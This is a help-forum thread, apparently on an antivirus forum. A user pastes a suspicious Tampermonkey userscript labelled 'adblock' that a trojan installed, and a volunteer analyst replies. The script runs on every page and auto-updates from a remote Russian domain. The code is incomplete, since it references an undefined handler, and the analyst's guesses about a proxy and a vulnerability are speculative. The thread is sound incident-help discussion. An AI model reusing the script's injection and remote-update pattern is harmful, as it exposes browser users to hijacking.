Hello everyone a trojan installed a chrome extention called tampermonkey and activated a javascript:

// ==UserScript==
// @name adblock
// @version 0.0.9
// @description Отслеживает сайты, баннеры, всплывающие окна и рекламу в видео.
// @updateURL http://tritogan.ru/{guid}.user.js567890123456789012.user.js
// @run-at document-start
// @include *
// ==/UserScript==

cooki=navigator.cookieEnabled;

var ExpDate_sg = new Date ();
ExpDate_sg.setTime(ExpDate_sg.getTime() + (24 * 60 * 60 * 1000));
SetCookie(‘stop_sg’,‘1’,ExpDate_sg, “/”);

function GetCookie (name) {
var arg = name + “=”;
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" “, i) + 1; if (i == 0) break; } return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + “=” + escape (value) +
((expires == null) ? “” : (”; expires=" + expires.toGMTString())) +
((path == null) ? “” : (“; path=” + path)) +
((domain == null) ? “” : (“; domain=” + domain)) +
((secure == true) ? “; secure” : “”);
}

document.onmousedown=Showtime;

I asume that it is a cookie stealer, just before I opened the trojan I was doing bank financial stuff. Is there any danger that people got my credentials? Can somebody explain what happened?

Hi robbegaeremynck

This could have been installed from behind an Ukrainian proxy
(Did you use that to mask the access dot telenet dot be address?)
proxy-installers.df according to the IP address: 193.238.153.2

User script Tracks sites, banners, pop-ups and ads in video, according to the txt in Russian.

In that script there is a

JavaScript - error: undefined variable Showtime

A bug like that could be a vulnerability, but it does not have to be one.
However could be an attack to exploit that vulnerability. Too early to say.

When you suspect to have run into malware, you could have one of our qualified remover here have a look at it.
Go to this link and provide the logs asked in there: https://forum.avast.com/index.php?topic=194892.0

With this scan I do not see any malware being reported ->: https://www.virustotal.com/#/domain/tritogan.ru

Tampermonkey is a valid extension to run user scripts inside Google Chrome browser. I use it myself within Chrome.
Nothing wrong with that, as one knows what one is doing.
Some user scripts could pose a threat when tampermonkey warns against installing.
Can understand it is questionable whenever a browser user is new to it, and/or does not know what it does exactly.

polonus (volunteer website security analyst and website error-hunter)